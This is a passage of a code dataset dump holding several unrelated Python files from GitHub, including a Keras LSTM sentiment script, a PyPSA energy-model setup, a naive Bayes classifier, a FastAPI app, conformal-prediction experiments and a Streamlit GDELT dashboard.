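a.update({k: v for k, v in b.items() if k not in a})  # merge only the new keys
print(collisions)  # [2]
print(a)           # {1: 1, 2: 4, 3: 9, 8: 64}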
LrHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n self.lr = []\n def on_epoch_begin(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n self.lr.append(step_decay(initial_rate))\n\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, input_length= maxlen))\nmodel.add(LSTM(128, dropout= 0.2, return_sequences=True))\nmodel.add(LSTM(64, dropout= 0.2, return_sequences=True))\nmodel.add(LSTM(32, dropout = 0.2))\nmodel.add(Dense(1, activation='sigmoid'))\nepochs = 15\nlrate = 0.01\ndecay = lrate/epochs\nadam = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\nsgd = SGD(lr=lrate, momentum=0.9, decay=decay, nesterov=False)\n# try using different optimizers and different optimizer configs\nmodel.compile(loss='binary_crossentropy',\n optimizer = adam,\n metrics=['accuracy'])\n\nprint('Train...')\nloss, acc = model.evaluate(x_train, y_train, verbose=0)\ninitial_rate = 0.001 / np.exp(loss)\nhistory = LossHistory()\nmodel.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=15,\n validation_data=(x_test, y_test), callbacks=[history])\n\nlen = len(history.losses)\nepoch = np.arange(1, len + 1)\nfor i in range(len):\n print ('epoch: %d, acc: %.4f' % (i + 1, history.losses[i]))\n\nprint(epoch)\nimport matplotlib.pyplot as plt\nplt.plot(epoch, history.losses)\nplt.show()\nscore, acc = model.evaluate(x_test, y_test,\n batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc) #donexxx","repo_name":"woshiduwei/ECE885_mini2","sub_path":"lstm_imdb_expotential loss rate.py","file_name":"lstm_imdb_expotential loss rate.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71806342248","text":"#判断子序列\nclass Solution(object):\n def isSubsequence(self, s, t):\n list_s = list(s)\n list_t = list(t)\n if len(list_s) == 0:\n return True\n start = 0\n count = 0\n flag = False\n for i in range(len(list_s)):\n for j in range(start, len(list_t)):\n if list_t[j] == list_s[i]:\n flag = True\n start = j+1\n count += 1\n break\n if flag is False or count != len(list_s):\n return False\n return True\n\nsolution = Solution()\nprint(solution.isSubsequence(\"abc\", \"ahbgdc\"))","repo_name":"fnxiang/LeetcodePractice","sub_path":"daily_practice/Dynamic_Planning/Q392.py","file_name":"Q392.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3033164685","text":"import pandas as pd\nimport numpy as np\nimport pyomo.environ as pe\nimport pypsa\nidx = pd.IndexSlice\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\ndef make_options():\n \"\"\" Returns a dict with options for the model and the solver \"\"\"\n\n options = {\n \"solver\": {\n \"name\": \"cplex\",\n \"options\": {None}\n },\n \"step\": 1,\n \"co2_limit\": 0.,\n }\n\n if options['solver']['name'] == \"gurobi\" or options['solver']['name'] == \"gurobi_persistent\":\n options['solver']['options'] = {\"threads\" : 4,\"method\" : 2,\"crossover\" : 0,\"BarConvTol\": 1.e-4,\"FeasibilityTol\": 1.e-4}\n if options['solver']['name'] == \"cplex\":\n options['solver']['options'] = {\"lpmethod\":4,\"threads\":4,\"simplex tolerances optimality\":1e-5,\"solutiontype\":2}\n \n return options\n\n\ndef annuity(lifetime,discount_rate):\n \"\"\" Returns the annuity factor \"\"\"\n\n if 
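A side note on the Keras snippet above: its step_decay evaluates the whole training set inside the schedule, and the LearningRateScheduler it builds is never passed to fit. The callback API expects a schedule mapping the epoch index to a learning rate; a minimal correct sketch (the decay constants are assumptions):

import numpy as np
from keras.callbacks import LearningRateScheduler

def step_decay(epoch, lr=None):
    # halve the rate every 5 epochs, starting from 1e-3
    return 1e-3 * np.power(0.5, np.floor(epoch / 5.0))

lr_schedule = LearningRateScheduler(step_decay, verbose=1)
# then: model.fit(x_train, y_train, epochs=15, callbacks=[history, lr_schedule])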
discount_rate == 0.:\n return 1/lifetime\n else:\n return discount_rate/(1. - 1. / (1. + discount_rate)**lifetime)\n \n\ndef prepare_costs(file_name = \"pypsa-eur-sec-30/data/costs/costs.csv\", number_years=1, usd_to_eur=1/1.2, costs_year=2030):\n \"\"\" \n Returns a pd.DataFrame with model-ready asset costs and other parameters \n \n based on: arXiv:1801.05290. \n \"\"\"\n\n costs = pd.read_csv(file_name, index_col=[0,1,2]).sort_index()\n\n #correct units to MW and EUR\n costs.loc[costs.unit.str.contains(\"/kW\"),\"value\"]*=1e3\n costs.loc[costs.unit.str.contains(\"USD\"),\"value\"]*=usd_to_eur\n\n costs = costs.loc[idx[:,costs_year,:],\"value\"].unstack(level=2)\n\n #fill defaults\n costs = costs.fillna({\"CO2 intensity\" : 0,\n \"FOM\" : 0,\n \"VOM\" : 0,\n \"discount rate\" : 0.07,\n \"efficiency\" : 1,\n \"fuel\" : 0,\n \"investment\" : 0,\n \"lifetime\" : 25\n })\n\n #annualise investment costs and add FOM\n costs[\"fixed\"] = [(\n annuity(v[\"lifetime\"],v[\"discount rate\"]) \\\n +v[\"FOM\"]/100.)*v[\"investment\"]*number_years \n for i,v in costs.iterrows()\n ]\n\n return costs\n\ndef extra_functionality(esom,snapshots):\n '''\n Adds extra technical constraints to the standard pypsa formulation. \n\n based on: arXiv:1801.05290.\n '''\n \n def battery_charge_discharge(model):\n return model.link_p_nom[\"DE battery charger\"] == \\\n model.link_p_nom[\"DE battery discharger\"]*esom.links.at[\"DE battery charger\",\"efficiency\"]\n esom.model.battery_charge_discharge = pe.Constraint(rule=battery_charge_discharge)\n \n #ratio between max heat output and max electric output\n nom_r = 1.\n \n #backpressure limit\n c_m = 0.75\n \n #marginal loss for each additional generation of heat\n # c_v = 0.15 # is already applied, see prepare_network: options['chp_parameters']['eta_elec']/options['chp_parameters']['c_v']\n \n #Guarantees heat output and electric output nominal powers are proportional\n def chp_nom_propotion(model):\n return nom_r*esom.links.at[\"DE central CHP electric\",\"efficiency\"]*model.link_p_nom[\"DE central CHP electric\"] == \\\n esom.links.at[\"DE central CHP heat\",\"efficiency\"]*model.link_p_nom[\"DE central CHP heat\"]\n esom.model.chp_nom_propotion = pe.Constraint(rule=chp_nom_propotion)\n\n def chp_nom_propotion1(model):\n return nom_r*esom.links.at[\"DE industry CHP electric\",\"efficiency\"]*model.link_p_nom[\"DE industry CHP electric\"] == \\\n esom.links.at[\"DE industry CHP heat\",\"efficiency\"]*model.link_p_nom[\"DE industry CHP heat\"]\n esom.model.chp_nom_propotion1 = pe.Constraint(rule=chp_nom_propotion1)\n\n #Guarantees c_m p_b1 leq p_g1\n def chp_backpressure(model,snapshot):\n return c_m*esom.links.at[\"DE central CHP heat\",\"efficiency\"]*model.link_p[\"DE central CHP heat\",snapshot] <= \\\n esom.links.at[\"DE central CHP electric\",\"efficiency\"]*model.link_p[\"DE central CHP electric\",snapshot] \n esom.model.chp_backpressure = pe.Constraint(list(snapshots),rule=chp_backpressure) \n\n def chp_backpressure1(model,snapshot):\n return c_m*esom.links.at[\"DE industry CHP heat\",\"efficiency\"]*model.link_p[\"DE industry CHP heat\",snapshot] <= \\\n esom.links.at[\"DE industry CHP electric\",\"efficiency\"]*model.link_p[\"DE industry CHP electric\",snapshot] \n esom.model.chp_backpressure1 = pe.Constraint(list(snapshots),rule=chp_backpressure1) \n\n #Guarantees p_g1 +c_v p_b1 leq p_g1_nom\n def chp_top_iso_fuel_line(model,snapshot):\n return model.link_p[\"DE central CHP heat\",snapshot] + model.link_p[\"DE central CHP electric\",snapshot] <= \\\n 
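The CHP constraint families above carve out the classic back-pressure operating region: electric output is bounded below by c_m times heat output, and total dispatch is capped by the nominal electric capacity. A small standalone feasibility check makes the geometry concrete; the efficiencies and plant size here are illustrative assumptions, not values from the model:

def chp_point_feasible(p_heat, p_elec, p_elec_nom,
                       eta_heat=0.45, eta_elec=0.45, c_m=0.75):
    # back-pressure line: c_m * heat output <= electric output
    backpressure_ok = c_m * eta_heat * p_heat <= eta_elec * p_elec
    # top iso fuel line: heat dispatch + electric dispatch <= nominal electric capacity
    iso_fuel_ok = p_heat + p_elec <= p_elec_nom
    return backpressure_ok and iso_fuel_ok

print(chp_point_feasible(p_heat=40, p_elec=50, p_elec_nom=100))  # True
print(chp_point_feasible(p_heat=80, p_elec=10, p_elec_nom=100))  # False, below the back-pressure line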
model.link_p_nom[\"DE central CHP electric\"]\n esom.model.chp_top_iso_fuel_line = pe.Constraint(list(snapshots),rule=chp_top_iso_fuel_line)\n \n def chp_top_iso_fuel_line1(model,snapshot):\n return model.link_p[\"DE industry CHP heat\",snapshot] + model.link_p[\"DE industry CHP electric\",snapshot] <= \\\n model.link_p_nom[\"DE industry CHP electric\"]\n esom.model.chp_top_iso_fuel_line1 = pe.Constraint(list(snapshots),rule=chp_top_iso_fuel_line1)\n\n\n","repo_name":"lukasnacken/pypsa-sec-mga","sub_path":"scripts/prepare_model.py","file_name":"prepare_model.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35588725596","text":"def solution(s):\n text = s.split(\" \")\n arr = []\n for word in range(len(text)):\n for idx in range(len(text[word])):\n if idx % 2 == 0:\n # 대문자\n a = text[word][idx].upper()\n arr.append(a)\n\n else:\n # 소문자\n b = text[word][idx].lower()\n arr.append(b)\n arr.append(\".\")\n\n arr = \"\".join(arr)\n arr = arr.replace(\".\", \" \")\n\n return arr[:len(arr) - 1]\n","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16325439157","text":"from fastapi import FastAPI, APIRouter\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom fastapi.staticfiles import StaticFiles\r\n\r\nfrom core.settings import connect_to_mongo\r\nfrom app.routers import test, create, redirect, analytics\r\n\r\napp = FastAPI()\r\n\r\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\r\n\r\n\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\n\r\n@app.on_event(\"startup\")\r\nasync def startup_event():\r\n print(\"[START] Starting FastAPI\")\r\n\r\n await connect_to_mongo()\r\n\r\n\r\napp.include_router( test.router )\r\napp.include_router( create.router )\r\napp.include_router( analytics.router )\r\napp.include_router( redirect.router )\r\n","repo_name":"dvsh243/short.it","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9328189709","text":"import csv\nimport random\nimport math\nimport sys\n\ndef loadcsv(filename):\n lines = csv.reader(open(filename, \"r\"))\n dataset = list(lines)\n for i in range(len(dataset)):\n dataset[i] = [float(x) for x in dataset[i]]\n return dataset\n\ndef splitdataset(dataset, splitratio):\n trainsize = int(len(dataset) * splitratio)\n trainset = []\n copy = list(dataset)\n while len(trainset) < trainsize:\n index = random.randrange(len(copy))\n trainset.append(copy.pop(index))\n return [trainset, copy]\n\ndef separatebyclass(dataset):\n separated = {}\n for i in range(len(dataset)):\n vector = dataset[i]\n if vector[-1] not in separated:\n separated[vector[-1]] = []\n separated[vector[-1]].append(vector)\n return separated\n\n\ndef mean(numbers):\n mean = sum(numbers) / float(len(numbers))\n return mean\n\n\ndef stdev(numbers):\n avg = mean(numbers)\n variance = sum([pow(x-avg,2) for x in numbers])/float(len(numbers)-1)\n return math.sqrt(variance)\n\n\ndef summarize(dataset):\n summaries = [(mean(attribute), stdev(attribute)) for attribute in zip(*dataset)]\n del 
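A side note on the FastAPI snippet above: newer FastAPI releases prefer a lifespan context manager over the @app.on_event("startup") hook. A hedged sketch of the equivalent wiring, reusing connect_to_mongo from that snippet:

from contextlib import asynccontextmanager
from fastapi import FastAPI
from core.settings import connect_to_mongo  # as in the snippet above

@asynccontextmanager
async def lifespan(app: FastAPI):
    print("[START] Starting FastAPI")
    await connect_to_mongo()   # startup work
    yield                      # the application serves requests here
    # optional shutdown work goes after the yield

app = FastAPI(lifespan=lifespan)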
summaries[-1]\n    return summaries\n\n\ndef summarizebyclass(dataset):\n    separated = separatebyclass(dataset)\n    summaries = {}\n    for classValue, instances in separated.items():\n        summaries[classValue] = summarize(instances)\n    return summaries\n\n\ndef calculateProbability(x, mean, stdev):\n    exponent = math.exp(-(math.pow(x - mean, 2) / (2 * math.pow(stdev, 2))))\n    probability = (1 / (math.sqrt(2 * math.pi) * stdev)) * exponent\n    return probability\n\n\ndef calculateClassProbabilities(summaries, inputVector):\n    probabilities = {}\n    for classValue, classSummaries in summaries.items():\n        probabilities[classValue] = 1\n        for i in range(len(classSummaries)):\n            mean, stdev = classSummaries[i]\n            x = inputVector[i]\n            probabilities[classValue] *= calculateProbability(x, mean, stdev)\n    return probabilities\n\n\ndef predict(summaries, inputVector):\n    probabilities = calculateClassProbabilities(summaries, inputVector)\n    bestLabel, bestProb = None, -1\n    for classValue, probability in probabilities.items():\n        if bestLabel is None or probability > bestProb:\n            bestProb = probability\n            bestLabel = classValue\n    return bestLabel\n\n\ndef getpredictions(summaries, testSet):\n    predictions = []\n    for i in range(len(testSet)):\n        result = predict(summaries, testSet[i])\n        predictions.append(result)\n    return predictions\n\n\ndef getaccuracy(testSet, predictions):\n    correct = 0\n    for x in range(len(testSet)):\n        if testSet[x][-1] == predictions[x]:\n            correct += 1\n    return (correct / float(len(testSet))) * 100.0\n\n\ndef main():\n    dataset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\MedicalData.csv\")\n    testset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\testset.csv\")\n    summaries = summarizebyclass(dataset)\n    predictions = getpredictions(summaries, testset)\n    print(predictions)\n    accuracy = getaccuracy(testset, predictions)\n    print(accuracy)\n    ageset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\age.csv\")\n    print(ageset)\n    sbpset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\sbp.csv\")\n    print(sbpset)\n    dbpset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\dbp.csv\")\n    print(dbpset)\n    cholset = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\chol.csv\")\n    print(cholset)\n    hao = loadcsv(\"C:\\\\Users\\\\krijan\\\\Documents\\\\Eclispes\\\\LearningHeart\\\\hao.csv\")\n    print(hao)\n\nmain()\n","repo_name":"krijanniroula/LearningHearts","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20699849915","text":"\"\"\"Create a game inventory. It must be possible to add items to it and remove items from it. The inventory must be limited by weight, and each item has its own weight. Items should be displayed with the item's name and its weight.\"\"\"\r\n\r\nweight = 0\r\ninventory = {'DragonLore': 6, 'Bread': 0.5, 'Dorogoi Dnevnik...': 0.3,\r\n             'Koshka': 1, 'Butterfly': 0.0}\r\n\r\nwhile True:\r\n    choose = input('''What do you want to do?\r\n    1. Add item\r\n    2. Delete item\r\n    3. View inventory\r\n    4. 
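Back to the Gaussian density in the naive Bayes code above, a quick sanity check: at x equal to the mean the density must be 1/(sqrt(2*pi)*stdev). Minimal sketch:

import math

def gaussian_pdf(x, mean, stdev):
    exponent = math.exp(-((x - mean) ** 2) / (2 * stdev ** 2))
    return exponent / (math.sqrt(2 * math.pi) * stdev)

print(round(gaussian_pdf(0.0, 0.0, 1.0), 4))  # 0.3989 == 1/sqrt(2*pi)
print(round(gaussian_pdf(2.0, 0.0, 1.0), 4))  # 0.054, two standard deviations out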
Exit\r\n ''')\r\n weight = sum(inventory.values())\r\n print(weight, '/100', sep='')\r\n \r\n if weight > 100:\r\n print('You are overloaded')\r\n elif choose == '1' and weight < 100:\r\n dweight = int(input('Input weight: '))\r\n weight = weight + dweight\r\n if weight < 100:\r\n inventory[input('Enter a name ')] = dweight\r\n else:\r\n print('Error')\r\n elif choose == '2':\r\n inventory.pop(input('What do you want to delete '))\r\n elif choose == '3':\r\n print(inventory)\r\n elif choose == '4':\r\n break\r\n else:\r\n print(\"Error\")\r\n","repo_name":"GGelios/Tenzor_DZ_4","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13841189258","text":"from all_experiments.prediction import run_pred_experiment, run_age_pred\nfrom all_experiments.cov_shift import run_cov_shift\nfrom all_experiments.model_bias import run_model_bias\nfrom all_experiments.nn_capacity import run_nn_capacity\nfrom all_experiments.toy_plot import plot_toy_example\nfrom datasets.datasets import GaussianDataGenerator, px_model, mu_model, sigma_model\nfrom tqdm import tqdm\nimport numpy as np\nimport utils\nimport config\nimport pandas as pd\nimport logging\nimport os\nimport pdb\n\nlogger = logging.getLogger('SLCP.main')\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(os.path.join(os.getcwd(), 'results')):\n os.mkdir(os.path.join(os.getcwd(), 'results'))\n utils.set_logger(os.path.join('./results', f'history_{config.UtilsParams.experiment}_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.log')) \n logger.info('\\n\\n<---------------NEW RUN--------------->')\n\n if config.UtilsParams.experiment == 'prediction':\n logger.info('Running conformal prediction task.')\n dataset_list = [\n # 'simulation_1', \n # 'simulation_2', \n # 'simulation_3', \n # 'star',\n # 'meps_19', \n # 'meps_20', \n # 'meps_21', \n # 'facebook_1', \n # 'facebook_2', \n # 'bio', \n # 'blog_data', \n # 'bike', \n # 'concrete', \n # 'community',\n 'age'\n ]\n model_list = [\n # 'random_forest', \n # 'linear', \n # 'neural_net',\n # 'kde',\n 'age_regr'\n ]\n method_name = [\n 'slcp-knn', \n 'slcp-rbf', \n 'slcp-mean',\n # 'cqr', \n # 'cqr-asy', \n # 'split', \n # 'lacp', \n # 'qr'\n ]\n\n all_cov_rate = np.zeros((len(model_list), len(method_name)))\n all_length = np.zeros((len(model_list), len(method_name)))\n for data in tqdm(dataset_list):\n for i, model in enumerate(model_list):\n for j, method in enumerate(method_name):\n logger.info('~~~~~~~~~~~~~~~~~~~~~~~~~~')\n logger.info(f'Dataset: {data} | Model: {model} | Method: {method}.')\n is_cp = False if method == 'qr' else True\n if data != 'age':\n cov_rate, length = run_pred_experiment(dataset_name=data, \n model_name=model, \n method_name=method, \n random_seed=config.UtilsParams.seed,\n conformal=is_cp)\n else:\n cov_rate, length = run_age_pred(dataset_name=data, \n model_name=model, \n method_name=method, \n random_seed=config.UtilsParams.seed)\n all_cov_rate[i, j] += cov_rate\n all_length[i, j] += length\n logger.info('=======================================================================')\n\n all_cov_rate /= len(dataset_list)\n all_length /= len(dataset_list)\n cov_rate_result = pd.DataFrame(data=all_cov_rate, index=model_list, columns=method_name)\n length_result = pd.DataFrame(data=all_length, index=model_list, columns=method_name)\n 
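The accumulate-average-label pattern above in miniature (the names and shapes here are illustrative):

import numpy as np
import pandas as pd

models, methods = ['linear', 'neural_net'], ['split', 'cqr']
acc = np.zeros((len(models), len(methods)))
for _ in range(3):              # stand-in for the per-dataset loop
    acc += np.ones((2, 2))
acc /= 3                        # average over datasets
table = pd.DataFrame(acc, index=models, columns=methods)
print(table)                    # rows labeled by model, columns by method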
cov_rate_result.to_csv(f'./results/cov_rate_plot_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.csv')\n length_result.to_csv(f'./results/length_plot_{config.ConformalParams.k}_{config.ConformalParams.valid_ratio}.csv')\n\n if config.UtilsParams.experiment == 'cov_shift':\n logger.info('Running covariate shift experiment.')\n run_cov_shift()\n\n if config.UtilsParams.experiment == 'model_bias':\n logger.info('Running model bias experiment.')\n run_model_bias()\n \n if config.UtilsParams.experiment == 'toy_plot':\n logger.info('Running toy plot experiment.')\n plot_toy_example()\n\n if config.UtilsParams.experiment == 'nn_capacity':\n logger.info('Running NN capacity experiment.')\n dataset = 'simulation_2'\n run_nn_capacity(config.UtilsParams.seed, dataset)\n \n logger.info('Program done!')","repo_name":"aaronhan223/SLCP","sub_path":"SLCP/run_all_experiments.py","file_name":"run_all_experiments.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17079072212","text":"from collections import Counter\nfrom operator import itemgetter\nimport datetime\n\nimport streamlit as st\n\nimport numpy as np\n\nimport plotly.express as px\nimport plotly.graph_objects as go\n\nimport vaex\n\nfrom wordcloud import WordCloud\n\nfrom actor_codes import actor_codes\n\n# Turn cache on\nif not vaex.cache.is_on():\n vaex.cache.on()\n\n# Load the data\ndf = vaex.open('/data/gdelt/events_v2_streamlit.hdf5')\ndf = df._future()\n\n# Build up the filter\ndef create_filter(codes, date_min, date_max):\n filter = (df.Actor1Type1Code.isin(codes) |\n df.Actor1Type2Code.isin(codes) |\n df.Actor1Type3Code.isin(codes) |\n df.Actor2Type1Code.isin(codes) |\n df.Actor2Type2Code.isin(codes) |\n df.Actor2Type3Code.isin(codes))\n if date_min is not None:\n filter = filter & (df.Date >= date_min)\n if date_max is not None:\n filter = filter & (df.Date <= date_max)\n\n return filter\n\n\n# Compute all the relevant data\ndef compute_data(filter, binner_resolution, progress_function=None):\n # Filter the data\n dff = df.filter(filter)\n\n ## Aggregators for the global (worldwide trackers)\n aggs_global = {'mean_avg_tone': vaex.agg.mean(dff.AvgTone),\n 'std_avg_tone': vaex.agg.std(dff.AvgTone),\n 'mean_goldstein_scale': vaex.agg.mean(dff.GoldsteinScale),\n 'std_goldstein_scale': vaex.agg.std(dff.GoldsteinScale)}\n\n # Aggregators per country\n aggs_country = {'counts': 'count',\n 'avg_tone_sum': vaex.agg.sum(dff.AvgTone),\n 'goldstein_scale_sum': vaex.agg.sum(dff.GoldsteinScale),\n 'num_articles': vaex.agg.sum(dff.NumArticles),\n 'num_sources': vaex.agg.sum(dff.NumSources)}\n\n # Combine the country results\n aggs_country_combine = {'avg_tone': vaex.agg.sum('avg_tone_sum') / vaex.agg.sum('counts'),\n 'avg_tone': vaex.agg.sum('avg_tone_sum') / vaex.agg.sum('counts'),\n 'goldstein_scale': vaex.agg.sum('goldstein_scale_sum') / vaex.agg.sum('counts'),\n 'num_events': vaex.agg.sum('counts'),\n 'num_articles': vaex.agg.sum('num_articles'),\n 'num_sources': vaex.agg.sum('num_sources')}\n main_tree = vaex.progress.tree(progress_function)\n progress_groupby = main_tree.add(\"groupby\")\n progress_agg = main_tree.add(\"agg\")\n\n\n # Do the main operations, optimized pass over the data\n with progress_groupby:\n # The global single value summary stats\n total_events = dff.count(delay=True)\n avg_stats = dff.mean([dff.AvgTone, dff.GoldsteinScale], delay=True)\n total_stats = dff.sum([dff.NumSources, dff.NumArticles], 
delay=True)\n\n # Groupby per some time interval to plot the evolution of the tone and goldstein scale\n gdf = dff.groupby(vaex.BinnerTime(dff.Date, resolution=binner_resolution[0]), delay=True)\n\n\n # Groupby per country. There are two country codes (for each actor) so we do this twice and merge the results\n gdfc1 = dff.groupby(dff.Actor1CountryCode, delay=True)\n gdfc2 = dff.groupby(dff.Actor2CountryCode, delay=True)\n\n # Actor names - for the world cloud\n actor_names1 = dff.Actor1Name.value_counts(dropna=True, delay=True)\n actor_names2 = dff.Actor2Name.value_counts(dropna=True, delay=True)\n\n # Execute!\n dff.execute()\n\n # Gather the results of the computational graph\n # Global single value summary stats\n avg_tone, goldstein_scale = avg_stats.get()\n total_sources, total_articles = total_stats.get()\n\n with progress_agg:\n # Stats aggregated temporally\n gdf = gdf.get().agg(aggs_global)\n\n # Stats aggregated per country\n gdfc1 = gdfc1.get().agg(aggs_country)\n gdfc2 = gdfc2.get().agg(aggs_country)\n\n gdfc1.rename('Actor1CountryCode', 'CountryCode');\n gdfc2.rename('Actor2CountryCode', 'CountryCode');\n\n gdfc = vaex.concat((gdfc1, gdfc2))\n\n gdfc = gdfc.groupby('CountryCode').agg(aggs_country_combine)\n gdfc = gdfc.dropna(['CountryCode'])\n\n # Combine the two value counts result - a single dict of actor codes\n actor_names = Counter(actor_names1.get().to_dict()) + Counter(actor_names2.get().to_dict())\n del actor_names['missing']\n actor_names = dict(sorted(actor_names.items(), key = itemgetter(1), reverse = True)[:300])\n\n return avg_tone, goldstein_scale, total_events.get(), total_sources, total_articles, gdf, gdfc, actor_names\n\n\ndef create_line_plot(df, x, y, y_err, ylabel=None):\n '''\n :param df: a Vaex DataFrame\n :param x: an Expression to plot on the X axis\n :param y: an Expression to plot on the Y axis\n :param y_err: an Expression for the error (uncertainty) of the Y axis values\n :param ylabel: The label on the Y axis\n '''\n # Set the hovertemplate style\n hovertemplate = '<br> Date: %{x} <br> Value: %{y:.2f} ±%{customdata:.2f}<extra></extra>'\n\n # The range of the yaxis\n _mean_mm, _std_mm = df[y].minmax(), df[y_err].minmax()\n ylim = np.array([_mean_mm[0] - _std_mm[0], _mean_mm[1] + _std_mm[1]]) * 1.5\n\n # Get the data in a format Plotly accepts\n x = df[x].tolist()\n y = df[y].to_numpy()\n y_err = df[y_err].to_numpy()\n\n # The location of the error line (wrapping upon itself)\n y_err = (y + y_err).tolist() + (y - y_err).tolist()[::-1]\n\n\n # The traces...\n trace_mean = go.Scatter(x=x, y=y, customdata=y_err,\n hovertemplate=hovertemplate,\n showlegend=False)\n\n trace_std = go.Scatter(x=x + x[::-1], y=y_err,\n fill='toself', fillcolor='rgba(0, 100, 80, 0.2)',\n line=go.scatter.Line(width=0),\n hoverinfo='skip',\n showlegend=False)\n # The layout\n layout = go.Layout(xaxis=go.layout.XAxis(title='Date'),\n yaxis=go.layout.YAxis(title=ylabel, range=ylim),\n margin=go.layout.Margin(l=0, r=0, b=0, t=0),\n height=300,\n )\n\n return go.Figure(data=[trace_mean, trace_std], layout=layout)\n\n\ndef create_world_map(df):\n fig = px.choropleth(data_frame=df.to_pandas_df(),\n locations='CountryCode',\n color='avg_tone',\n color_continuous_scale='viridis_r',\n hover_data=['num_events', 'num_articles', 'num_sources', 'goldstein_scale'])\n\n hovertempate ='''<b>Country: %{location}</b><br>\n\n <br>Total events: %{customdata[0]:.3s}\n <br>Total articles: %{customdata[1]:.3s}\n <br>Total sources: %{customdata[2]:.3s}\n <br>Mean Tone: %{z:.2f}\n <br>Mean Goldstein 
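The Counter addition used in compute_data above is a keyed sum of the two per-actor value counts; in miniature, with made-up counts:

from collections import Counter

a = Counter({'GERMANY': 3, 'FRANCE': 1, 'missing': 2})
b = Counter({'GERMANY': 2, 'SPAIN': 5, 'missing': 1})
merged = a + b              # per-key sums across both mappings
del merged['missing']       # drop the placeholder bucket, as above
top = dict(sorted(merged.items(), key=lambda kv: kv[1], reverse=True)[:2])
print(top)                  # {'GERMANY': 5, 'SPAIN': 5}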
scale: %{customdata[3]:.2f}\n '''\n with fig.batch_update():\n fig.update_layout(coloraxis_showscale=False)\n fig.update_layout(width=1000)\n fig.update_layout(margin=go.layout.Margin(l=0, r=0, b=0, t=0),)\n fig.update_xaxes(showticklabels=False)\n fig.update_yaxes(showticklabels=False)\n fig.update_traces(hovertemplate=hovertempate)\n fig.update_layout(geo=go.layout.Geo(projection=go.layout.geo.Projection(type='natural earth')))\n fig.update_layout(coloraxis_showscale=False)\n return fig\n\n\ndef create_wordcloud(actor_names):\n wordcloudmaker = WordCloud(background_color='white',\n width=1200,\n height=900,\n max_words=len(actor_names))\n wc_data = wordcloudmaker.generate_from_frequencies(actor_names)\n\n # Display the wordcloud\n fig = px.imshow(wc_data)\n with fig.batch_update():\n fig.update_layout(coloraxis_showscale=False)\n fig.update_xaxes(showticklabels=False)\n fig.update_yaxes(showticklabels=False)\n fig.layout['margin'] = {\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0}\n fig.data[0]['hoverinfo'] = 'skip'\n fig.data[0]['hovertemplate'] = None\n return fig\n\n\ndef human_format(num):\n '''Better formatting of large numbers\n Kudos to:\n '''\n num = float('{:.3g}'.format(num))\n magnitude = 0\n while abs(num) >= 1000:\n magnitude += 1\n num /= 1000.0\n return '{}{}'.format('{:f}'.format(num).rstrip('0').rstrip('.'), ['', 'K', 'M', 'B', 'T'][magnitude])\n\n\ndef get_actor_code_descriptions(codes):\n x = ''\n for code in codes:\n x += f' - {code}: {actor_codes.get(code)} \\n'\n return x\n\n\ndef show_page():\n\n # Additional options for the sidebar\n # Choose actor codes\n codes = st.sidebar.multiselect(\n label='Select Actor Types',\n default='EDU',\n options=list(actor_codes.keys()),\n help='Select one ore more Actor Type codes.')\n\n # Specify date range\n date_range = st.sidebar.slider(\n label='Date Range',\n min_value=datetime.date(2014, 2, 18),\n max_value=datetime.date(2022, 4, 2),\n value=(datetime.date(2014, 2, 18), datetime.date(2022, 4, 2)),\n step=datetime.timedelta(days=1),\n help='Select a date range.')\n\n # Specify time resolution\n binner_resolution = st.sidebar.selectbox(label='Time Resolution', options=['Day', 'Week', 'Month', 'Year'], index=1)\n\n # Show a progress 